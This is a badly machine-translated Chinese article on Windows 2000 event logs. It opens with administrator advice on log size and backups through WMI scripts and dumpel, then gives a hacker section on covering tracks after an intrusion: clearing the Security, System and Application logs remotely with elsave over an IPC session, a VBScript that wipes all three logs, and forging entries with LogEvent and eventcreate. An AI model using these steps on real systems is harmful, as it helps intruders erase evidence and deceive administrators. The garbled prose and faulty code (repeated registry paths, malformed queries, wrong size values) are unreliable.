(forward from:
http://www.xfocus.net/articles/200208/435.html)
The role of the system is obvious. Whether it is a network administrator or hacker, it is very valid to log. A experienced administrator can quickly understand the system's security through the log, and a smart hacker will often succeed in invasion. The log is quickly cleared to the log. Let's discuss the safety and creation of logs.
One: Overview: Windows2000 System Log Files include application logs, security logs, system logs, DNS server logs, etc., Application logs, security logs, system logs, DNS log default location:% systemroot% / system32 / config, default File size 512kb.
Safety Log File:% SystemRoot% / System32 / Config / SECEVENT.EVT
System log file:% systemroot% / system32 / config / sysevent.evt
Application Log File:% SystemRoot% / System32 / Config / APPEVENT.EVT
These log files are in the registry:
HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / EVENTLOG
Some administrators are likely to locate these logs. There are many sub-tables below EventLog, which can find the location directory of the above logs.
2: As a network administrator:
1. Log security configuration:
Under the default condition, the size of the log is 512KB, if it exceeds it, it will be reported, and no log will be recorded. So the primary task is to change the default size, the specific method: the HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SYSTEM / CURRENTCONTROLSET / SYSTEM / CURRENTCONTROLSET / SYSTEM / CURRENTCONTROLSET / SERVICES / EVENTLOG corresponds to a maxSize subkey, and the modification can be modified.
A script from the Microsoft site is given, using the VMI to set the log max 25MB, and allow the log to overwrite the logs of 14 days before:
This script utilizes WMI objects, WMI (Windows Management Instrument) technology is a system management tool under Windows provided by Microsoft. This tool can be used locally or manages almost everything in the client system. Many professional network management tools are developed based on WMI. The tool is a standard tool under Win2000 and WinNT, which is an extended installation option under Win9x. So the following code can run success in more than 2000.
StrComputer = "."
Set objwmiservice = getObject ("WinMgmts:" _
& "{ImpersonationLevel = Impersonate, (Security)}}! //" & _
Strcomputer & "/ root / cimv2") "Get VMI objects
Set collogfiles = objwmiservice.execQuery_
("SELECT * WIN32_NTEVENTLOGFILE")
For Each Objlogfile in Collogfiles
Strlogfilename = Objlogfile.name
Set WMISWBEMOBJECT = GetObject_
("Winmgmts: {ImpersonationLevel = Impersonate}! //./ Root / CIMv2:" _
& "Win32_nteventlogfile.name = '" & strlogfilename & "'") WMISWBEMOBJECT.MAXFILESIZE = 2500000000
WMISWBEMOBJECT.OVERWRITEOUTDATED = 14
WMISWBEMOBJECT.PUT_
NEXT
Use the script to the NETT in the note to the VBS as a suffix.
It is also necessary to explain the strcomputer = "in the code." The meaning in the Windows script is equivalent to localhost. If you want to execute code on the remote host, you only need to turn "." The change is the host name, of course, first, you must have the other party. Administrator privileges and establish IPC connections. The strComputer appears in this document can be changed.
2. Query and backup of logs:
A excellent administrator is a habit that should develop backup logs. If there is conditional, you should also transfer the log to the backup machine or dump directly to the printer. The author has an article "Using scripting to format the output system log. ", Detailed telling the use of Windows scripts to dump log and output into html pages, which is interested, can be viewed, hereby recommend Microsoft's Resourcekit toolbox in Dumpel.exe, his common way:
Dumpel -f filename -s // server -l log
-f filename output log position and file name
-S // Server output remote computer log
-l log logs are optional for System, Security, Application, there may be other such as DNS, etc.
To put the system logs on the target server Server to Backupsystem.log can use the following format:
Dumpel // Server -l System -f Backupsystem.log
Rehabilitate the scheduled task can realize the regular backup system log.
Also use script programming VMI objects can also easily implement log backups:
The following is the code for the backup Application log:
Backuplog.vbs
StrComputer = "."
Set objwmiservice = getObject ("WinMgmts:" _
& "{ImpersonationLevel = Impersonate, (Backup)}! //" & _
Strcomputer & "/ root / cimv2") "Get VMI objects
Set collogfiles = objwmiservice.execQuery_
("SELECT * WIN32_NTEVENTLOGFILE WHERE LOGFILENAME = 'Application'") 'Gets application logs in log objects
For Each Objlogfile in Collogfiles
ErrBackuplog = Objlogfile.backupeventLog ("f: /Application.evt") 'to back up logs to f: /Application.evt
IF Errbackuplog <> 0 THEN
WScript.echo "The Application Event log could not be backed up."
Else Wscript.echo "Success Backup Log"
END IF
NEXT
Program Description: If the backup success will be prompted: "Success Backup log" otherwise prompt: "The Application Event Log Could Not Be backed UP, the log for this backup is f: /Application.evt for the Application backup location, you can modify it yourself The format of the backup here is the original format of EVT, and the notepad is open to garbled, this is not as convenient to Dumpel. Three: as a hacker
1. Day to clear
The first thing that a hacker after the intrusion system is the first thing to clear the log. If the remote control of the other machine is remotely controlled from the terminal, the delete log is not a difficult thing. Due to the log, although it is also a service run, But different from HTTP, FTP, can stop first, then delete, then delete it, use NET STOP EVENTLOG in the m command line, so some people think that it is difficult to delete the log in the command line, actually In this way, the following describes several ways:
1. With a third-party tool: such as Xiaoyan's Elsave.exe remotely clear system, Applicaton, Security software, usage is very simple, first use the obtained administrator account to establish IPC session with the other party, NET USE // ip Pass / User : User
Then the command line: Elsave -s // ip -l application -c, which deletes the security log.
In fact, it is also possible to use this software to make a backup log, as long as a parameter -F filename is OK, it is no longer detailed.
2. Using the VMI in the script, you can also remove the log, first get the Object object, then use its ClearEventLog () method to delete the log. Source code:
Cleanevent.vbs
StrComputer = "."
Set objwmiservice = getObject ("WinMgmts:" _
& "{ImpersonationLevel = Impersonate, (Backup)}! //" & _
STRComputer & "/ root / cimv2")
DIM MYLOGS (3)
Mylogs (1) = "Application"
MYLOGS (2) = "system"
MYLOGS (3) = "Security"
For Each Logs in Mylogs
Set collogfiles = objwmiservice.execQuery_
("SELECT * WIN32_NTEVENTLOGFILE WHERE LOGFILENAME = '" & logs & "'")
For Each Objlogfile in Collogfiles
Objlogfile.cleareventlog ()
NEXT
NEXT
In the above code, create an array, for Application, Security, if there is any other log, you can join an array.
Then use a for loop to delete each element in the array, that is, each log.
2. Create a log:
After the log is deleted, any administrator with minds faces the empty log, and it will react to the invasion immediately, so a smart hacker learns how
Forged log:
1. Use the EventLog method in the script program is to create logs very simple; look at a code below
Createlog.vbs
SET WS = WScript.createObject ("wscript.shell") WS.LOGEVENT 0, "Write Log Success" creates a successful log
This code is easy to read, first get a shell object of WScript, then use the LOGEVENT method of the shell object.
Logevent Usage: Logevent EventType, "Description" [, Remote System]
EventType is the log type, you can use as follows: 0 represents successful execution, 1 Perform an error, 2 warning, 4, information, 8 successful auditing 16 troubleshooting
Therefore, in the above code, the 0 is changed to 1, 2, 4, 8, 16, and the quotation marks will be described.
The log writes by this method has a disadvantage that only the application log can only be written, and the days to the source can only be WSH, which is Windows Scripting Host, so there is not much hidden role.
2, Microsoft In order to facilitate system administrators and programmers, Microsoft has a new command line tool, EventCreate.exe, using it, and create a log easier.
Eventcreate -s server -l logname -u username -p password -so source -t evenettype -id ID-DSCRIPTION
Meaning: -s Create a log for a remote host: -U remote host user password
-l log; you can create System and Application can't create a Security log.
-so log Source, you can be any log -T log type such as Information information, Error error, Warning warning,
-d log description, can be any statement-ID autonomous log is 1-1000
For example, we have to create a system log locally, and the source is admin, the log type is a warning, described as "this is a test", the event ID is 500
You can use the following parameters
Eventcreate -l system -so administrator -t warning -d "this is a test" -ID 500
This tool cannot create a security log. As for how to create a security log, I hope everyone can find a good way!
